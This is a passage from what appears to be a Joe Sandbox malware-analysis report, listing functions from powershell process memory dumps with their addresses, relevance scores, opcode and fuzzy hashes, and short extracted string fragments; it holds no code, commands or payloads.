                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aca9f95c5af0ab267027d78815504057093e0756a3885a7ff972522b84d8a15a
                                                      • Instruction ID: fcae9d27c7bb0caebc93cdceabf71d5c82ed2c40cae5d64a4ef6715dcc1119f0
                                                      • Opcode Fuzzy Hash: aca9f95c5af0ab267027d78815504057093e0756a3885a7ff972522b84d8a15a
                                                      • Instruction Fuzzy Hash: BB216B31F10315ABDBA4596B88007BFBAC69FC4711F14882AA549DF384DE75D985C3A0
                                                      Function 06FB0DFC Relevance: .1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2eeceeeae88a3644d888f5ad116f2031c76805b36c06bb6aad2ca5b60911c3d2
                                                      • Instruction ID: 57c7e54f0722e4086c9f377fa557896a5790dc8e3dc66096aeb907e39c336444
                                                      • Opcode Fuzzy Hash: 2eeceeeae88a3644d888f5ad116f2031c76805b36c06bb6aad2ca5b60911c3d2
                                                      • Instruction Fuzzy Hash: D7216B31F043857FD791097A88007BB6F965F95700F1884AAA948DF2D6CE75C984C370
                                                      Function 06FB0C08 Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 234c404ee19e06e1a8e317aab6909ae7d9f34d1dea84438bd9939bbb8be89dfd
                                                      • Instruction ID: ec58c2b4a68ec77daa12553f7abf8cdf559a7fadc17b70315e48d6ff74676f08
                                                      • Opcode Fuzzy Hash: 234c404ee19e06e1a8e317aab6909ae7d9f34d1dea84438bd9939bbb8be89dfd
                                                      • Instruction Fuzzy Hash: 4D01D436B102199FC7A4556BD4005BBB7D9DBC1622F14C43EE559CB651DF32C849C7B0
                                                      Function 0081D01D Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1948114493.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_81d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f2d824e5ae27a44e916c726d85ff935d9384117333cf499d6efcafb8a5e89b97
                                                      • Instruction ID: 1aa02c29f51a7fc7af698db69f8db4d9667bb9900bc19e217287b3682d3e9aa2
                                                      • Opcode Fuzzy Hash: f2d824e5ae27a44e916c726d85ff935d9384117333cf499d6efcafb8a5e89b97
                                                      • Instruction Fuzzy Hash: 3001F771508B049AE7108A29C9847A7BFDCFF59324F18C529ED488E146C27998C1C6B1
                                                      Function 0081D01C Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1948114493.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_81d000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cc0853aca4aa215a726b94e11533efc7c94a1c3e4b62bb0b703afe342b07ff24
                                                      • Instruction ID: 9330c05946752d3b97eaa0a1674fef739c227b1edf55ceb54c46eeb2ae72f6ad
                                                      • Opcode Fuzzy Hash: cc0853aca4aa215a726b94e11533efc7c94a1c3e4b62bb0b703afe342b07ff24
                                                      • Instruction Fuzzy Hash: 0DF0C272404740AEE7108A1AC9C4BA3FFECEF55334F18C55AED484E286C2799881CAB0

                                                      Non-executed Functions

                                                      Function 06FBC2B0 Relevance: 14.1, Strings: 11, Instructions: 384COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                      • API String ID: 0-2779274079
                                                      • Opcode ID: c2c0a4e990183aabe1e38cdd2f1d24a87bed04d7fa81ab3969e9095d20c9ae92
                                                      • Instruction ID: e5cfdd61b1766eca17974fbf57bcd51761a395c496cfd97127770d207bddcd57
                                                      • Opcode Fuzzy Hash: c2c0a4e990183aabe1e38cdd2f1d24a87bed04d7fa81ab3969e9095d20c9ae92
                                                      • Instruction Fuzzy Hash: BFC11531F00208DFDB988F2ED4046FBBBA6AF85211F24D46AE859CF255DB31D985CB91
                                                      Function 06FB2548 Relevance: 12.8, Strings: 10, Instructions: 309COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                      • API String ID: 0-3512890053
                                                      • Opcode ID: 4d39a01e26187f130912d244cbf9f7f07da9e0c1f7e6a812ac35b6fef29cfb58
                                                      • Instruction ID: d978804c99dbf4b5a5c08005fbbf216dc947eb74a9f4ac8561774eeff74ff478
                                                      • Opcode Fuzzy Hash: 4d39a01e26187f130912d244cbf9f7f07da9e0c1f7e6a812ac35b6fef29cfb58
                                                      • Instruction Fuzzy Hash: 86A16B31F042099FDB654A3A88546FABBE6AF82210F24947BE805CF355DF71CA85C7E1
                                                      Function 06FB1EB8 Relevance: 10.4, Strings: 8, Instructions: 405COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$t~qq$$^q$$^q$$^q
                                                      • API String ID: 0-1719666192
                                                      • Opcode ID: 5709c6dc5a274197f69f7999bf0e97b76a33ac9354ea2a202e352b80d67eacb0
                                                      • Instruction ID: f9ac00b6db0df4f9e25b54f7fc9f29d971aa78278901820692e75dc81a4825b8
                                                      • Opcode Fuzzy Hash: 5709c6dc5a274197f69f7999bf0e97b76a33ac9354ea2a202e352b80d67eacb0
                                                      • Instruction Fuzzy Hash: C9C15531F002059FDBA49B7A98106FBBBE6BFC5210F14947AE909CB255DF32CA45C7A1
                                                      Function 06FBE490 Relevance: 10.4, Strings: 8, Instructions: 374COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (f#l$(f#l$(f#l$(f#l$4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-920252228
                                                      • Opcode ID: b6daff09724dd40f39dec2193aea41d0d7c6b0cfe0a4e73a529c3eb21ce34dd1
                                                      • Instruction ID: 7887c6c03c410e13e5d8f7cd7edbeef6adaccf11a86ee9cba9900c1265f6ec16
                                                      • Opcode Fuzzy Hash: b6daff09724dd40f39dec2193aea41d0d7c6b0cfe0a4e73a529c3eb21ce34dd1
                                                      • Instruction Fuzzy Hash: 5DE1BF70F102189FDB54DB69C951AEEBBB3BF88340F149429D8056F395CB36EC868B91
                                                      Function 06FBEA28 Relevance: 10.2, Strings: 8, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (f#l$(f#l$(f#l$(f#l$4'^q$4'^q$4 l$4 l
                                                      • API String ID: 0-2933226611
                                                      • Opcode ID: 8b0a23d7144569c54bc1aff3a7d6d5ff1d12b2c96d57bd910d564959e2da1308
                                                      • Instruction ID: 9e6b333fb890697083bc7dd583d856379a19d5653655af4edc35a3da0508c401
                                                      • Opcode Fuzzy Hash: 8b0a23d7144569c54bc1aff3a7d6d5ff1d12b2c96d57bd910d564959e2da1308
                                                      • Instruction Fuzzy Hash: 6161B070F002189FDB58CB69C455AEABBF6BF88350F14E469D806AB354CB36DC85CB91
                                                      Function 06FBD404 Relevance: 10.2, Strings: 8, Instructions: 165COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$84!l$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                      • API String ID: 0-2331792618
                                                      • Opcode ID: 732f6e348477a1fb2c16c91bd0322fcdf10159143172dbfdf1aa5e471579b14c
                                                      • Instruction ID: 3dd8490330cced411113afb88d99574ebd5f86f6232655e1836e75fc5af3eef6
                                                      • Opcode Fuzzy Hash: 732f6e348477a1fb2c16c91bd0322fcdf10159143172dbfdf1aa5e471579b14c
                                                      • Instruction Fuzzy Hash: 0351C331E01208DFDBA48F0BC544BE677A2FF45355F19A46AE8095B295C771EC84CBA3
                                                      Function 06FBCED0 Relevance: 8.9, Strings: 7, Instructions: 163COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$84!l$d%dq$d%dq$d%dq$tP^q$$^q
                                                      • API String ID: 0-3145875699
                                                      • Opcode ID: 26113a659afd3c9d4f0f260312b8d5b5cd0ab5fd0eaa1e6d3dbafe1036f8becd
                                                      • Instruction ID: 0d18af29e8db104d96eee712a66a4062fa5ed18a19a2cf8b4298b908e4297a47
                                                      • Opcode Fuzzy Hash: 26113a659afd3c9d4f0f260312b8d5b5cd0ab5fd0eaa1e6d3dbafe1036f8becd
                                                      • Instruction Fuzzy Hash: BD51C635E00208DFEB688F16C944AEBBBF2AF44750F18A196E8059F295C731DD45CBB2
                                                      Function 06FB8B30 Relevance: 7.6, Strings: 6, Instructions: 105COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                      • API String ID: 0-2392861976
                                                      • Opcode ID: 3e184c66963285b327e27e272d8aed7f0055ea1b1feb3a3369106c7765667f0e
                                                      • Instruction ID: 5acaa530885dd59ceac6e305b997192147335f7d00e247f575b2c85b4e1f4003
                                                      • Opcode Fuzzy Hash: 3e184c66963285b327e27e272d8aed7f0055ea1b1feb3a3369106c7765667f0e
                                                      • Instruction Fuzzy Hash: E33127B6F0435A8FDB690A7798405E6F7A9ABC1291718D8BFC0628F255DE32C449C351
                                                      Function 06FBD016 Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$84!l$d%dq$d%dq$d%dq$tP^q
                                                      • API String ID: 0-2951483478
                                                      • Opcode ID: 99c22d1119b41ff1388140078d68c46398e674200e34863bc58b5c44e5711047
                                                      • Instruction ID: f28eaa90d57c8d99b8837461e0426341f25723714712dfd12d2acae80aa4f442
                                                      • Opcode Fuzzy Hash: 99c22d1119b41ff1388140078d68c46398e674200e34863bc58b5c44e5711047
                                                      • Instruction Fuzzy Hash: 1B319175F00118DFEB68DF59C444A9ABBA2BF88750F28A155E809AB355C632DC41CBA2
                                                      Function 06FBC780 Relevance: 5.5, Strings: 4, Instructions: 493COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (o^q$(o^q$(o^q$(o^q
                                                      • API String ID: 0-1978863864
                                                      • Opcode ID: 0184ef4f79203d926e14df1db7a4c8c4b1ffde2f367e0fd05d8a4296b1cc33ea
                                                      • Instruction ID: b15ed5aa4be1819260de2277d4707b30ccfb7489f2c1f9cfcf88c11c2c74e369
                                                      • Opcode Fuzzy Hash: 0184ef4f79203d926e14df1db7a4c8c4b1ffde2f367e0fd05d8a4296b1cc33ea
                                                      • Instruction Fuzzy Hash: D4F14632F04348DFDB558F6AD814BEBBFA2AF85310F14946AE415CB291DB32D845CBA1
                                                      Function 06FBE48D Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (f#l$(f#l$4'^q$4'^q
                                                      • API String ID: 0-2555332335
                                                      • Opcode ID: 1bb606753ff7c9fc4ccd56e646257eb3acb10838bfb8a4b0ad8eecc763809d32
                                                      • Instruction ID: 20b0c582c6e2275714921d3bd1ba168dd292168a23c4f0e3abf0cb45fa7db274
                                                      • Opcode Fuzzy Hash: 1bb606753ff7c9fc4ccd56e646257eb3acb10838bfb8a4b0ad8eecc763809d32
                                                      • Instruction Fuzzy Hash: 7BC1BD74E10218DFDB64DB55C941AEEBBB3BF88340F249429D9066B355CB32EC86CB91
                                                      Function 06FB4CB8 Relevance: 5.3, Strings: 4, Instructions: 280COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 84!l$84!l$tP^q$tP^q
                                                      • API String ID: 0-2671327094
                                                      • Opcode ID: 5bfc1aa3bab8c8d8c2964a534d5836383d344281669780ea2337d9f38d0ce2b9
                                                      • Instruction ID: 952c61e79f552e459f7fe6c6d2891ea1e1d5b4a8fd1ed8fca270a25a80381cb3
                                                      • Opcode Fuzzy Hash: 5bfc1aa3bab8c8d8c2964a534d5836383d344281669780ea2337d9f38d0ce2b9
                                                      • Instruction Fuzzy Hash: 11913B31F002059FD7589F7AD950ABBBBE6AF85710F148869E905CF39ACA31D844C7A1
                                                      Function 06FB00F0 Relevance: 5.3, Strings: 4, Instructions: 251COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$XY#l$XY#l
                                                      • API String ID: 0-3017105699
                                                      • Opcode ID: a99ae6c15d39c59415bc12dce0f29990253cb12c76ce0321f3ff0c950b090d21
                                                      • Instruction ID: 00a0aa537124feef176091efd64f153c7a64db7842eff49988ddaa8e47d1a2a6
                                                      • Opcode Fuzzy Hash: a99ae6c15d39c59415bc12dce0f29990253cb12c76ce0321f3ff0c950b090d21
                                                      • Instruction Fuzzy Hash: 91815A31F053489FCB559B6A9804AEBBFA5AFC5214F18D0ABD445CF252DE31C845C7A1
                                                      Function 06FB6780 Relevance: 5.2, Strings: 4, Instructions: 250COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (f#l$(f#l$(f#l$(f#l
                                                      • API String ID: 0-2541482469
                                                      • Opcode ID: 0fb436a531c17efe1dcb9206cbda1318d9e6e8aa0636b66aa513f1fd4bc71c25
                                                      • Instruction ID: e5ff9cd62ccb9401712ea309f782dc1ed7fbfb67bc0089a5f2d6ca85ef4b0d5e
                                                      • Opcode Fuzzy Hash: 0fb436a531c17efe1dcb9206cbda1318d9e6e8aa0636b66aa513f1fd4bc71c25
                                                      • Instruction Fuzzy Hash: 0CA19F75E10614DFDB60CF56C481AAAFBB2BF89750F14E529D816AB744CB32E842CF90
                                                      Function 06FBEA1D Relevance: 5.2, Strings: 4, Instructions: 158COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (f#l$(f#l$4'^q$4 l
                                                      • API String ID: 0-4178797188
                                                      • Opcode ID: 7739d9b72a3d92735b2edbe16936c0bfaccf813cb4e6a4a16c5660f453861a21
                                                      • Instruction ID: 66c5f8f92b950d46045ad112ef6ec4dbaf92a05775aeba00bc47c62d0c5a4713
                                                      • Opcode Fuzzy Hash: 7739d9b72a3d92735b2edbe16936c0bfaccf813cb4e6a4a16c5660f453861a21
                                                      • Instruction Fuzzy Hash: 21518D70E00205DFDB68CF55C495AEAFBB6BF88350F18E569D8056B354CB32E885CB91
                                                      Function 06FB1070 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $^q$$^q$$^q$$^q
                                                      • API String ID: 0-2125118731
                                                      • Opcode ID: f8665239f3584c568aafde9651fca9a6baca81becd8416e70aec9b4935aef615
                                                      • Instruction ID: e08741863b5b2509976748435c6ecbb9190a09bbf47f9857cd4ed0750eb8e5a7
                                                      • Opcode Fuzzy Hash: f8665239f3584c568aafde9651fca9a6baca81becd8416e70aec9b4935aef615
                                                      • Instruction Fuzzy Hash: 5D218B32F102095BEBB4D57B9C60BA7A7DA9BD0751F24942BA405CB385CD36C841C360
                                                      Function 06FB1CC0 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$$^q$$^q
                                                      • API String ID: 0-2049395529
                                                      • Opcode ID: ec175c6ef289b84a32eda4ebd175cc12f4125b4c49a7792537f67ff52f98766f
                                                      • Instruction ID: 55b010b78dcec713fc717323e3f0680c6d19f2c16ebfe0d523b6508d00921959
                                                      • Opcode Fuzzy Hash: ec175c6ef289b84a32eda4ebd175cc12f4125b4c49a7792537f67ff52f98766f
                                                      • Instruction Fuzzy Hash: 7201B111A0A3891FD76A52292C206A66FB61FCB61072A04D7D080CF257CD158D4983B2